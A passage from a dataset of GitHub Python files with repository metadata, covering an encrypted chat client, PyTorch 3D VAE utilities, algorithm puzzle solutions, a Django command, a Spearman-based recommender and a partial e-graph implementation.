MemoryBuffer\nfrom Crypto import Random\nfrom Shared.constants import *\nfrom Shared.constants import ClientMode\nfrom Shared.dhke import DH\nfrom Shared.encrypted_socket import EncryptedSocket\nfrom typing import List, Dict, Optional\nfrom base64 import b64encode, b64decode\n\n\nRSA_KEY_LEN = 2048\nSESSION_SALT_LEN = 16\nSESSION_KEY_LEN = 32\nPRIV_KEY_FILE = 'private_key.pem'\nPUB_KEY_FILE = 'public_key.pem'\n\n\nclass Client:\n\n def __init__(self, server_address: str, port=DEFAULT_PORT):\n\n self.username = None\n self.cookie = None\n self.user_id = None\n self.pub_key = None\n self.requester = Requester(server_address, port)\n self.listener = Listener(server_address, port, self)\n # TODO: generate private key if necessary\n try:\n self.private_key = RSA.load_key(PRIV_KEY_FILE)\n except BIOError:\n print(\"Private key not found :(\")\n self.private_key = None\n\n def stop(self):\n self.listener.connection.close()\n sys.exit()\n\n def login(self, username: str, password: str):\n response = self.requester.request({'action': Action.LOGIN,\n 'username': username,\n 'password': password})\n cookie = response.get(\"cookie\")\n user_id = response.get(\"id\")\n if cookie and user_id:\n self.username = username\n self.cookie = cookie\n self.user_id = user_id\n self.pub_key = self.get_public_key(self.user_id)\n else:\n # TODO: Throw exception!\n print(response.get(\"error\"))\n self.listener.send({'cookie': self.cookie}, ClientMode.LISTEN)\n threading.Thread(target=self.listener.listen).start()\n\n def request(self, payload: Dict) -> Dict:\n if self.cookie is not None:\n payload['cookie'] = self.cookie\n return self.requester.request(payload)\n\n def generate_keys(self):\n key = RSA.gen_key(RSA_KEY_LEN, 65537)\n self.private_key = key\n key.save_key(PRIV_KEY_FILE, None)\n key.save_pub_key(PUB_KEY_FILE)\n f = open(PUB_KEY_FILE, 'r')\n public_key = f.read()\n f.close()\n self.requester.request({'action': Action.SET_KEY,\n 'content': public_key,\n 'cookie': self.cookie})\n\n def get_session_key(self, session: int) -> bytes:\n response = self.request({'action': Action.GET_SESSION_KEY, 'session': session})\n encrypted_session_key = response.get('session_key')\n if not encrypted_session_key:\n raise Exception('Session key not found :(')\n return self.decrypt_session_key(encrypted_session_key)\n\n def decrypt_session_key(self, encrypted: str):\n encrypted_bytes = b64decode(encrypted)\n return self.private_key.private_decrypt(encrypted_bytes, RSA.pkcs1_oaep_padding)[SESSION_SALT_LEN:]\n\n def get_sessions(self) -> List:\n response = self.request({'action': Action.GET_SESSIONS})\n return response['sessions']\n\n def get_messages(self, session: int) -> List:\n response = self.request({'action': Action.GET_MESSAGES, 'session': session})\n return response['messages']\n\n @staticmethod\n def load_public_key(pub_key_str: str):\n bio = MemoryBuffer(pub_key_str.encode('utf-8'))\n return RSA.load_pub_key_bio(bio)\n\n def get_public_key(self, user: int) -> Optional[RSA.RSA_pub]:\n response = self.request({'action': Action.GET_PUBLIC_KEY, 'user': user})\n public_key_str = response['public_key']\n return self.load_public_key(public_key_str)\n\n def get_username(self, user: int) -> str:\n response = self.request({'action': Action.GET_USERNAME, 'user': user})\n return response['name']\n\n def create_session(self, members: List[int]):\n session_key = Random.new().read(SESSION_KEY_LEN)\n members_with_keys = []\n for member in members:\n public_key = self.get_public_key(member)\n salt = Random.new().read(SESSION_SALT_LEN)\n encrypted_bytes = public_key.public_encrypt(salt + session_key, RSA.pkcs1_oaep_padding)\n members_with_keys.append((member, b64encode(encrypted_bytes).decode('utf-8')))\n self.request({'action': Action.CREATE_SESSION, 'members': members_with_keys})\n\n def create_account(self, username: str, password: str, fullname: str):\n response = self.request({'action': Action.CREATE_ACCOUNT,\n 'username': username,\n 'password': password,\n 'fullname': fullname})\n print(response)\n self.user_id = response.get('id')\n self.cookie = response.get('cookie')\n self.generate_keys()\n\n\nclass AuthenticationError(Exception):\n\n def __init__(self, *args, **kwargs):\n Exception.__init__(self, *args, **kwargs)\n\n\nclass EncryptedSocketClient(EncryptedSocket):\n\n def __init__(self, connection: socket.socket):\n super().__init__(connection)\n\n def dh(self) -> bytes:\n payload = self.get_plaintext_packet()\n p, g, server_key = payload['p'], payload['g'], payload['pk']\n private_key = DH.gen_private_key()\n public_key = DH.gen_public_key(g, private_key, p)\n self.send({'key': public_key}, ClientMode.DH)\n shared_key = DH.get_shared_key(server_key, private_key, p)\n return shared_key\n\n\nclass Requester(EncryptedSocketClient):\n\n def __init__(self, server_address: str, port: int):\n self.server_address = server_address\n self.port = port\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n super().__init__(connection)\n # TODO: do something else here?\n self.connection.close()\n\n def request(self, payload: Dict) -> Dict:\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.connection.connect((self.server_address, self.port))\n self.key = self.dh()\n self.send(payload, ClientMode.REQUEST)\n response = self.get_plaintext_packet()\n self.connection.close()\n self.key = None\n return response\n\n\nclass Listener(EncryptedSocketClient):\n\n def __init__(self, server_address: str, port: int, client: Client):\n self.client = client\n connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n connection.connect((server_address, port))\n super().__init__(connection)\n self.key = self.dh()\n self.interface = None\n\n def set_interface(self, interface):\n self.interface = interface\n\n def listen(self):\n\n while True:\n try:\n payload = self.get_plaintext_packet()\n except ConnectionError:\n print(\"Listener connection lost\")\n return\n if payload['type'] == 'message':\n self.interface.listener_add_msg(payload)\n","repo_name":"spec-sec/SecureChat2","sub_path":"Client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"73126336854","text":"from itertools import chain\nimport numpy as np\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch import distributed as dist\n\ndef shift_dim(x, src_dim=-1, dest_dim=-1, make_contiguous=True):\n n_dims = len(x.shape)\n if src_dim < 0:\n src_dim = n_dims + src_dim\n if dest_dim < 0:\n dest_dim = n_dims + dest_dim\n\n assert 0 <= src_dim < n_dims and 0 <= dest_dim < n_dims\n\n dims = list(range(n_dims))\n del dims[src_dim]\n\n permutation = []\n ctr = 0\n for i in range(n_dims):\n if i == dest_dim:\n permutation.append(src_dim)\n else:\n permutation.append(dims[ctr])\n ctr += 1\n x = x.permute(permutation)\n if make_contiguous:\n x = x.contiguous()\n return x\n\ndef view_range(x, i, j, shape):\n shape = tuple(shape)\n\n n_dims = len(x.shape)\n if i < 0:\n i = n_dims + i\n\n if j is None:\n j = n_dims\n elif j < 0:\n j = n_dims + j\n\n assert 0 <= i < j <= n_dims\n\n x_shape = x.shape\n target_shape = x_shape[:i] + shape + x_shape[j:]\n return x.view(target_shape)\n\ndef scaled_dot_product_attention(q, k, v, mask=None, attn_dropout=0., training=True):\n # Performs scaled dot-product attention over the second to last dimension dn\n\n # (b, n_head, d1, ..., dn, d)\n attn = torch.matmul(q, k.transpose(-1, -2))\n attn = attn / np.sqrt(q.shape[-1])\n if mask is not None:\n attn = attn.masked_fill(mask == 0, float('-inf'))\n attn_float = F.softmax(attn, dim=-1)\n attn = attn_float.type_as(attn) # b x n_head x d1 x ... x dn x d\n attn = F.dropout(attn, p=attn_dropout, training=training)\n\n a = torch.matmul(attn, v) # b x n_head x d1 x ... x dn x d\n\n return a\n\nclass SamePadConv3d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, bias=True):\n super().__init__()\n if isinstance(kernel_size, int):\n kernel_size = (kernel_size,) * 3\n if isinstance(stride, int):\n stride = (stride,) * 3\n\n # assumes that the input shape is divisible by stride\n total_pad = tuple([k - s for k, s in zip(kernel_size, stride)])\n pad_input = []\n for p in total_pad[::-1]: # reverse since F.pad starts from last dim\n pad_input.append((p // 2 + p % 2, p // 2))\n pad_input = sum(pad_input, tuple())\n self.pad_input = pad_input\n\n self.conv = nn.Conv3d(in_channels, out_channels, kernel_size,\n stride=stride, padding=0, bias=bias)\n\n def forward(self, x):\n return self.conv(F.pad(x, self.pad_input))\n\nclass AxialAttention(nn.Module):\n def __init__(self, n_dim, axial_dim):\n super().__init__()\n if axial_dim < 0:\n axial_dim = 2 + n_dim + 1 + axial_dim\n else:\n axial_dim += 2 # account for batch, head, dim\n self.axial_dim = axial_dim\n\n def forward(self, q, k, v, decode_step, decode_idx):\n q = shift_dim(q, self.axial_dim, -2).flatten(end_dim=-3)\n k = shift_dim(k, self.axial_dim, -2).flatten(end_dim=-3)\n v = shift_dim(v, self.axial_dim, -2)\n old_shape = list(v.shape)\n v = v.flatten(end_dim=-3)\n\n out = scaled_dot_product_attention(q, k, v, training=self.training)\n out = out.view(*old_shape)\n out = shift_dim(out, -2, self.axial_dim)\n return out\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, shape, dim_q, dim_kv, n_head, n_layer,\n causal, attn_type, attn_kwargs):\n super().__init__()\n self.causal = causal\n self.shape = shape\n\n self.d_k = dim_q // n_head\n self.d_v = dim_kv // n_head\n self.n_head = n_head\n\n self.w_qs = nn.Linear(dim_q, n_head * self.d_k, bias=False) # q\n self.w_qs.weight.data.normal_(std=1.0 / np.sqrt(dim_q))\n\n self.w_ks = nn.Linear(dim_kv, n_head * self.d_k, bias=False) # k\n self.w_ks.weight.data.normal_(std=1.0 / np.sqrt(dim_kv))\n\n self.w_vs = nn.Linear(dim_kv, n_head * self.d_v, bias=False) # v\n self.w_vs.weight.data.normal_(std=1.0 / np.sqrt(dim_kv))\n\n self.fc = nn.Linear(n_head * self.d_v, dim_q, bias=True) # c\n self.fc.weight.data.normal_(std=1.0 / np.sqrt(dim_q * n_layer))\n \n self.attn = AxialAttention(len(shape), **attn_kwargs)\n\n self.cache = None\n\n def forward(self, q, k, v, decode_step=None, decode_idx=None):\n \"\"\" Compute multi-head attention\n Args\n q, k, v: a [b, d1, ..., dn, c] tensor or\n a [b, 1, ..., 1, c] tensor if decode_step is not None\n Returns\n The output after performing attention\n \"\"\"\n\n # compute k, q, v\n d_k, d_v, n_head = self.d_k, self.d_v, self.n_head\n q = view_range(self.w_qs(q), -1, None, (n_head, d_k))\n k = view_range(self.w_ks(k), -1, None, (n_head, d_k))\n v = view_range(self.w_vs(v), -1, None, (n_head, d_v))\n\n # b x n_head x seq_len x d\n # (b, *d_shape, n_head, d) -> (b, n_head, *d_shape, d)\n q = shift_dim(q, -2, 1)\n k = shift_dim(k, -2, 1)\n v = shift_dim(v, -2, 1)\n\n # fast decoding\n if decode_step is not None:\n if decode_step == 0:\n if self.causal:\n k_shape = (q.shape[0], n_head, *self.shape, self.d_k)\n v_shape = (q.shape[0], n_head, *self.shape, self.d_v)\n self.cache = dict(k=torch.zeros(k_shape, dtype=k.dtype, device=q.device),\n v=torch.zeros(v_shape, dtype=v.dtype, device=q.device))\n else:\n # cache only once in the non-causal case\n self.cache = dict(k=k.clone(), v=v.clone())\n if self.causal:\n idx = (slice(None, None), slice(None, None), *[slice(i, i+ 1) for i in decode_idx])\n self.cache['k'][idx] = k\n self.cache['v'][idx] = v\n k, v = self.cache['k'], self.cache['v']\n\n a = self.attn(q, k, v, decode_step, decode_idx)\n\n # (b, *d_shape, n_head, d) -> (b, *d_shape, n_head * d)\n a = shift_dim(a, 1, -2).flatten(start_dim=-2)\n a = self.fc(a) # (b x seq_len x embd_dim)\n\n return a\n\nclass AxialBlock(nn.Module):\n def __init__(self, n_hiddens, n_head):\n super().__init__()\n kwargs = dict(shape=(0,) * 3, dim_q=n_hiddens,\n dim_kv=n_hiddens, n_head=n_head,\n n_layer=1, causal=False, attn_type='axial')\n self.attn_w = MultiHeadAttention(attn_kwargs=dict(axial_dim=-2),\n **kwargs)\n self.attn_h = MultiHeadAttention(attn_kwargs=dict(axial_dim=-3),\n **kwargs)\n self.attn_t = MultiHeadAttention(attn_kwargs=dict(axial_dim=-4),\n **kwargs)\n\n def forward(self, x):\n x = shift_dim(x, 1, -1)\n x = self.attn_w(x, x, x) + self.attn_h(x, x, x) + self.attn_t(x, x, x)\n x = shift_dim(x, -1, 1)\n return x\n\nclass AttentionResidualBlock(nn.Module):\n def __init__(self, in_channel, n_hiddens):\n super().__init__()\n self.block = nn.Sequential(\n nn.BatchNorm3d(in_channel),\n nn.ReLU(),\n SamePadConv3d(in_channel, n_hiddens, 3, bias=False),\n nn.BatchNorm3d(n_hiddens),\n nn.ReLU(),\n SamePadConv3d(n_hiddens, in_channel, 1, bias=False),\n nn.BatchNorm3d(in_channel),\n nn.ReLU(),\n AxialBlock(in_channel, 2)\n )\n\n def forward(self, x):\n return x + self.block(x)\n\nclass ResBlock(nn.Module):\n def __init__(self, in_channel, channel):\n super().__init__()\n\n self.conv = nn.Sequential(\n nn.ReLU(),\n nn.Conv3d(in_channel, channel, 3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv3d(channel, in_channel, 1),\n )\n\n def forward(self, input):\n out = self.conv(input)\n out += input\n\n return out\n\nclass Quantizer(nn.Module):\n # Code taken from:\n # https://colab.research.google.com/github/zalandoresearch/pytorch-vq-vae/blob/master/vq-vae.ipynb#scrollTo=fknqLRCvdJ4I\n\n \"\"\"\n EMA-updated Vector Quantizer\n \"\"\"\n def __init__(\n self, num_embeddings, embedding_dim, commitment_cost=0.25, decay=0.99, laplace_alpha=1e-5\n ):\n super(Quantizer, self).__init__()\n\n embed = torch.randn(num_embeddings, embedding_dim)\n self.register_buffer(\"embed\", embed) # e_i\n self.register_buffer(\"embed_avg\", embed.clone()) # m_i\n self.register_buffer(\"cluster_size\", torch.zeros(num_embeddings)) # N_i\n self.register_buffer(\"first_pass\", torch.as_tensor(1))\n\n self.commitment_cost = commitment_cost\n\n self.decay = decay\n self.laplace_alpha = laplace_alpha\n\n self.embedding_dim = embedding_dim\n self.num_embeddings = num_embeddings\n\n def embed_code(self, embed_idx):\n return F.embedding(embed_idx, self.embed)\n\n def _update_ema(self, flat_input, encoding_indices):\n # buffer updates need to be in-place because of distributed\n encodings_one_hot = F.one_hot(\n encoding_indices, num_classes=self.num_embeddings\n ).type_as(flat_input)\n\n new_cluster_size = encodings_one_hot.sum(dim=0)\n dw = encodings_one_hot.T @ flat_input\n\n if torch.distributed.is_initialized():\n torch.distributed.all_reduce(new_cluster_size)\n torch.distributed.all_reduce(dw)\n\n self.cluster_size.data.mul_(self.decay).add_(\n new_cluster_size, alpha=(1-self.decay)\n )\n\n self.embed_avg.data.mul_(self.decay).add_(dw, alpha=(1-self.decay))\n\n # Laplacian smoothing\n n = self.cluster_size.sum()\n cluster_size = n * ( # times n because we don't want probabilities but counts\n (self.cluster_size + self.laplace_alpha)\n / (n + self.num_embeddings * self.laplace_alpha)\n )\n\n embed_normalized = self.embed_avg / cluster_size.unsqueeze(dim=-1)\n self.embed.data.copy_(embed_normalized)\n\n def _init_ema(self, flat_input):\n mean = flat_input.mean(dim=0)\n std = flat_input.std(dim=0)\n cluster_size = flat_input.size(dim=0)\n\n if torch.distributed.is_initialized():\n torch.distributed.all_reduce(mean)\n torch.distributed.all_reduce(std)\n mean /= torch.distributed.get_world_size()\n std /= torch.distributed.get_world_size()\n\n cluster_size *= torch.distributed.get_world_size()\n\n self.embed.mul_(std)\n self.embed.add_(mean)\n self.embed_avg.copy_(self.embed)\n\n self.cluster_size.data.add_(cluster_size / self.num_embeddings)\n self.first_pass.mul_(0)\n\n @torch.cuda.amp.autocast(enabled=False)\n def forward(self, inputs):\n inputs = inputs.float()\n with torch.no_grad():\n channel_last = inputs.permute(0, 2, 3, 4, 1) # XXX: might not actually be necessary\n input_shape = channel_last.shape\n\n flat_input = channel_last.reshape(-1, self.embedding_dim)\n\n if self.training and self.first_pass:\n self._init_ema(flat_input)\n\n encoding_indices = torch.argmin(\n torch.cdist(flat_input, self.embed, compute_mode='donot_use_mm_for_euclid_dist')\n , dim=1)\n quantized = self.embed_code(encoding_indices).reshape(input_shape)\n\n if self.training:\n self._update_ema(flat_input, encoding_indices)\n\n # Cast everything back to the same order and dimensions of the input\n quantized = quantized.permute(0, 4, 1, 2, 3)\n encoding_indices = encoding_indices.reshape(input_shape[:-1])\n\n # Don't need to detach quantized; doesn't require grad\n e_latent_loss = F.mse_loss(quantized, inputs)\n loss = self.commitment_cost * e_latent_loss\n\n # Trick to have identity backprop grads\n quantized = inputs + (quantized - inputs).detach()\n\n # don't change this order without checking everything\n return (loss, quantized, encoding_indices)\n\nclass Encoder(nn.Module):\n def __init__(\n self,\n in_channel,\n channel,\n n_res_block,\n n_res_channel,\n stride=2,\n res=ResBlock\n ):\n super().__init__()\n if stride == 4:\n blocks = [\n nn.Conv3d(in_channel, channel // 2, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv3d(channel // 2, channel, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv3d(channel, channel, 3, padding=1),\n ]\n\n elif stride == 2:\n blocks = [\n nn.Conv3d(in_channel, channel // 2, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv3d(channel // 2, channel, 3, padding=1),\n ]\n\n for i in range(n_res_block):\n blocks.append(res(channel, n_res_channel))\n\n blocks.append(nn.ReLU(inplace=True))\n\n self.blocks = nn.Sequential(*blocks)\n\n def forward(self, data):\n return self.blocks(data)\n\nclass Decoder(nn.Module):\n def __init__(\n self,\n in_channel,\n out_channel,\n channel,\n n_res_block,\n n_res_channel,\n stride=2,\n res=ResBlock\n ):\n super().__init__()\n blocks = [nn.Conv3d(in_channel, channel, 3, padding=1)]\n\n for i in range(n_res_block):\n blocks.append(res(channel, n_res_channel))\n\n blocks.append(nn.ReLU(inplace=True))\n\n if stride == 4:\n blocks.extend(\n [\n nn.ConvTranspose3d(channel, channel // 2, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose3d(\n channel // 2, out_channel, 4, stride=2, padding=1\n ),\n ]\n )\n\n elif stride == 2:\n blocks.append(\n nn.ConvTranspose3d(channel, out_channel, 4, stride=2, padding=1)\n )\n\n self.blocks = nn.Sequential(*blocks)\n\n def forward(self, input):\n return self.blocks(input)\n\nclass MyQuantize(nn.Module):\n def __init__(self, n_embed, dim, decay=0.99, eps=1e-5):\n super().__init__()\n\n self.dim = dim\n self.n_embed = n_embed\n self.decay = decay\n self.eps = eps\n\n embed = torch.randn(dim, n_embed)\n self.register_buffer(\"embed\", embed)\n self.register_buffer(\"cluster_size\", torch.zeros(n_embed))\n self.register_buffer(\"embed_avg\", embed.clone())\n\n def get_world_size(self):\n if not dist.is_available():\n return 1\n\n if not dist.is_initialized():\n return 1\n\n return dist.get_world_size()\n\n def all_reduce(self, tensor, op=dist.ReduceOp.SUM):\n world_size = self.get_world_size()\n\n if world_size == 1:\n return tensor\n\n dist.all_reduce(tensor, op=op)\n return tensor\n\n def forward(self, input):\n flatten = input.reshape(-1, self.dim)\n dist = (\n flatten.pow(2).sum(1, keepdim=True)\n - 2 * flatten @ self.embed\n + self.embed.pow(2).sum(0, keepdim=True)\n )\n _, embed_ind = (-dist).max(1)\n embed_onehot = F.one_hot(embed_ind, self.n_embed).type(flatten.dtype)\n embed_ind = embed_ind.view(*input.shape[:-1])\n quantize = self.embed_code(embed_ind)\n\n if self.training:\n embed_onehot_sum = embed_onehot.sum(0)\n embed_sum = flatten.transpose(0, 1) @ embed_onehot\n\n self.all_reduce(embed_onehot_sum)\n self.all_reduce(embed_sum)\n\n self.cluster_size.data.mul_(self.decay).add_(\n embed_onehot_sum, alpha=1 - self.decay\n )\n self.embed_avg.data.mul_(self.decay).add_(embed_sum, alpha=1 - self.decay)\n n = self.cluster_size.sum()\n cluster_size = (\n (self.cluster_size + self.eps) / (n + self.n_embed * self.eps) * n\n )\n embed_normalized = self.embed_avg / cluster_size.unsqueeze(0)\n self.embed.data.copy_(embed_normalized)\n\n diff = (quantize.detach() - input).pow(2).mean()\n quantize = input + (quantize - input).detach()\n\n return quantize, diff, embed_ind\n\n def embed_code(self, embed_id):\n return F.embedding(embed_id, self.embed.transpose(0, 1))","repo_name":"julschoen/3D-VAE","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22573591607","text":"from collections import deque\n\n\ndef solution(n, edge):\n answer = 0\n visited = [-1] * (n + 1)\n graph = [[] for _ in range(n + 1)]\n for a, b in edge:\n graph[a].append(b)\n graph[b].append(a)\n \n q = deque()\n\n q.append(1)\n visited[1] = 0\n\n while q:\n num = q.popleft()\n for i in graph[num]:\n if visited[i] == -1:\n visited[i] = visited[num] + 1\n q.append(i)\n \n maxVal = max(visited)\n\n for i in range(1, len(visited)):\n if visited[i] == maxVal:\n answer += 1\n\n return answer\n\n","repo_name":"jjiwoning/Code_Test","sub_path":"python_algo/Programmers/far_node.py","file_name":"far_node.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6331554349","text":"#뭔가 느낌이 제일 왼쪽에 있는사람부터 제일 왼쪽에 있는거 먹이면 될거 같은 느낌이였음\nn, k = map(int,input().split())\narr = list(input().rstrip())\nresult = 0\nfor i in range(n):\n if arr[i] == 'P':\n for j in range(max(i-k,0),min(i+k+1,n)):\n if arr[j] == 'H':\n result += 1\n arr[j] = 'X'\n break\nprint(result)","repo_name":"cksdud150/HTG","sub_path":"10_1/19941.py","file_name":"19941.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34823200447","text":"import sys\nimport math\nfrom predictor import Predictor, compute_weighted_average, compute_mean, clean_user\nimport collections\nimport math\nfrom heapq import heappush, heappop\n\nclass Spearman(Predictor):\n\tdef __init__(self):\n\t\tself.user_data = None\n\n\tdef train(self, user_data):\n\t\tself.user_data = user_data\n\n\tdef predict(self, user_num, user_set, num_neighbors):\n\t\t#Make sure you hide the training data on the values in the user_set\n\t\tprediction_set = {}\n\t\tuser_pre_clean = self.user_data[user_num]\n\t\tuser_post_clean = clean_user(user_pre_clean, user_set)\n\t\t#user_post_clean contains all the values for a user not in our prediction set\n\t\tsimilarity_to_user = []\n\t\t#generate relevant subset\n\t\tfor user_v in self.user_data:\n\t\t\t# exclude current user\n\t\t\tif user_v != user_num:\n\t\t\t\tsimilarity = self.calculate_spearman_similarity(user_post_clean, self.user_data[user_v])\n\t\t\t\tsimilarity_to_user.append((similarity, self.user_data[user_v]))\n\t\tsimilarity_to_user.sort(key=lambda x: x[0], reverse=True)\n\t\tfor movie in user_set:\n\t\t\tprediction = compute_weighted_average(user_post_clean, similarity_to_user, movie, num_neighbors)\n\t\t\tif prediction > 5.0:\n\t\t\t\tprediction = 5.0\n\t\t\telif prediction < 0.5:\n\t\t\t\tprediction = 0.5\n\t\t\tprediction_set[movie] = prediction\n\t\treturn collections.OrderedDict(sorted(prediction_set.items()))\n\n\tdef calculate_spearman_similarity(self, u, v):\n\t\t#generate intersection subset\n\t\tintersection = []\n\t\tfor movie in u:\n\t\t\tif movie in v:\n\t\t\t\tintersection.append(movie)\n\t\tif len(intersection) == 0:\n\t\t\treturn 0\n\n\t\tmovie_ranks_u = {}\n\t\tmovie_ranks_v = {}\n\n\t\tindex = 0.5\n\t\twhile index <= 5.0:\n\t\t\tmovie_ranks_u[index] = 0\n\t\t\tmovie_ranks_v[index] = 0\n\t\t\tindex += 0.5\n\n\t\tfor movie in intersection:\n\t\t\tmovie_ranks_u[u[movie]] += 1\n\t\t\tmovie_ranks_v[v[movie]] += 1\n\n\t\tlist_of_u_ranks = []\n\t\tlist_of_v_ranks = []\n\t\tstarting_rank_u = 1.0\n\t\tstarting_rank_v = 1.0\n\n\t\tindex = 5.0\n\t\twhile index >= 0.5:\n\t\t\tin_block = movie_ranks_u[index]\n\t\t\tif in_block != 0:\n\t\t\t\tending_rank = starting_rank_u + in_block\n\t\t\t\tavg_rank = (starting_rank_u + ending_rank) / in_block\n\t\t\t\tfor i in range(in_block):\n\t\t\t\t\tlist_of_u_ranks.append(avg_rank)\n\t\t\t\tstarting_rank_u += in_block\n\t\t\tindex -= 0.5\n\n\t\tindex = 5.0\n\t\twhile index >= 0.5:\n\t\t\tin_block = movie_ranks_v[index]\n\t\t\tif in_block != 0:\n\t\t\t\tending_rank = starting_rank_v + in_block\n\t\t\t\tavg_rank = (starting_rank_v + ending_rank) / in_block\n\t\t\t\tfor i in range(in_block):\n\t\t\t\t\tlist_of_v_ranks.append(avg_rank)\n\t\t\t\tstarting_rank_v += in_block\n\t\t\tindex -= 0.5\n\n\t\tmean_u = compute_mean_spearman(list_of_u_ranks)\n\t\tmean_v = compute_mean_spearman(list_of_v_ranks)\n\n\t\tnumerator = 0.0\n\t\tdenominator = 0.0\n\t\t#compute numerator\n\t\tfor i in range(len(intersection)):\n\t\t\tnumerator += (list_of_u_ranks[i] - mean_u) * (list_of_v_ranks[i] - mean_v)\n\n\t\t#computer denominator\n\t\tterm1 = 0.0\n\t\tterm2 = 0.0\n\t\tfor i in range(len(intersection)):\n\t\t\tterm1 += math.pow(list_of_u_ranks[i] - mean_u, 2)\n\t\t\tterm2 += math.pow(list_of_v_ranks[i] - mean_v, 2)\n\t\tdenominator = math.sqrt(term1 * term2)\n\n\t\tif denominator == 0:\n\t\t\treturn 0.0\n\t\treturn numerator / denominator\n\ndef compute_mean_spearman(list_of_u_ranks):\n\tsum_u = 0.0\n\tfor rank in list_of_u_ranks:\n\t\tsum_u += rank\n\treturn sum_u / len(list_of_u_ranks)\n\n","repo_name":"0xnirmal/Collaborative-Filtering-Recommendation-Engine","sub_path":"Code/spearman.py","file_name":"spearman.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"23820110710","text":"from django.core.management.base import BaseCommand\nfrom courses.models import Student, Test\n\n\nclass Command(BaseCommand):\n help = 'List of students with the number of classes they have taken'\n\n def handle(self, *args, **options):\n students = Student.objects.select_related('user')\n tests = Test.objects.select_related('student')\n student_dict = {}\n\n for student in students:\n student_dict[student.user.username] = 0\n for student in tests:\n if student.testing:\n if student.student.user.username in student_dict.keys():\n student_dict[student.student.user.username] += 1\n\n print(student_dict)\n","repo_name":"IrynaMazaieva/Django","sub_path":"Education/courses/management/commands/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32314517385","text":"from collections import namedtuple, defaultdict\nfrom disjoint_set import DisjointSet\nimport itertools\n\n'''\nSimple (non-performant) implementation of \n egg: fast and extensible equality saturation\n https://dl.acm.org/doi/pdf/10.1145/3434304\n'''\n\nENode = namedtuple('Enode', ['op', 'operands'])\n\nclass Pattern:\n def __init__(self, op, *sub_patterns):\n self.op = op\n self.sub_patterns = sub_patterns\n self.is_leaf = not sub_patterns\n\n def get_sub_pattern(self, i):\n '''\n ### interface\n id -> Pattern\n '''\n return self.sub_patterns[i]\n\n def get_live_in(self):\n '''\n ### interface\n '''\n assert self.is_leaf\n return self.op\n\n def match_local(self, n):\n '''\n ### interface\n '''\n return self.op == n.op or self.is_leaf\n\n def apply(self, egraph, subst):\n if self.is_leaf:\n x = self.get_live_in()\n if x in subst:\n return egraph.get_id(subst[x])\n # x must be a constant\n return egraph.make(x)\n operands = [p.apply(egraph, subst) for p in self.sub_patterns]\n return egraph.make(self.op, *operands)\n\nclass Rewrite:\n def __init__(self, lhs, rhs, subst):\n # lhs and rhs are patterns\n self.lhs = lhs\n self.rhs = rhs\n # mapping -> \n self.subst = subst\n\n def apply(self, egraph, subst):\n '''\n ### interface\n subst -> enode\n '''\n return self.rhs.apply(\n egraph,\n {x2 : subst[x1]\n for x1, x2 in self.subst.items()})\n\ndef merge_substs(substs):\n merged = {}\n for subst in substs:\n if subst is None:\n return None\n for k, v in subst.items():\n if k in merged and merged[k] != v:\n return None\n merged[k] = v\n return merged\n\nclass EGraph:\n def __init__(self):\n self.counter = 0\n # node -> ids\n self.ids = {}\n # equivalence class over ids\n self.ec = DisjointSet()\n # mapping ids/values (not nodes) -> [(user, class id of user)]\n self.users = defaultdict(set)\n self.worklist = set()\n\n def size(self):\n return len(self.ids)\n\n def canonicalize(self, n):\n return ENode(n.op, tuple(self.ec.find(i) for i in n.operands))\n\n def make(self, op, *operands):\n return self.add(ENode(op, operands))\n\n def add(self, n):\n n = self.canonicalize(n)\n if n in self.ids:\n return self.ids[n]\n i = self.counter\n self.counter += 1\n self.ids[n] = i\n for j in n.operands:\n self.users[self.ec.find(j)].add((n, self.ec.find(i)))\n return i\n\n def get_id(self, n):\n assert n in self.ids\n return self.ec.find(self.ids[n])\n\n def merge(self, i, j):\n i = self.ec.find(i)\n j = self.ec.find(j)\n if i == j:\n return i\n\n users = self.users[i].union(self.users[j])\n self.ec.union(i, j)\n i = self.ec.find(i)\n self.worklist.add(i)\n self.users[i] = users\n return i\n\n def rebuild(self):\n while len(self.worklist) > 0:\n worklist = { self.ec.find(i) for i in self.worklist }\n self.worklist = set()\n for i in worklist:\n self.repair(i)\n\n def repair(self, i):\n for n, j in self.users[i]:\n if n in self.ids:\n del self.ids[n]\n self.ids[self.canonicalize(n)] = self.ec.find(j)\n\n new_users = {}\n for n, j in self.users[i]:\n n = self.canonicalize(n)\n if n in new_users:\n self.merge(j, new_users[n])\n new_users[n] = self.ec.find(j)\n self.users[i] = set(new_users.items())\n\n def equal(self, i, j):\n return self.ec.connected(i, j)\n\n def match_class(self, i, pat):\n for n, j in self.ids.items():\n if i == j:\n yield from self.match_node(n, pat)\n\n def match_node(self, n, pat):\n if not pat.match_local(n):\n return\n\n if pat.is_leaf:\n # match the live-in to n\n yield {pat.get_live_in(): n}\n return\n\n sub_matches = [self.match_class(operand, pat.get_sub_pattern(operand_id))\n for operand_id, 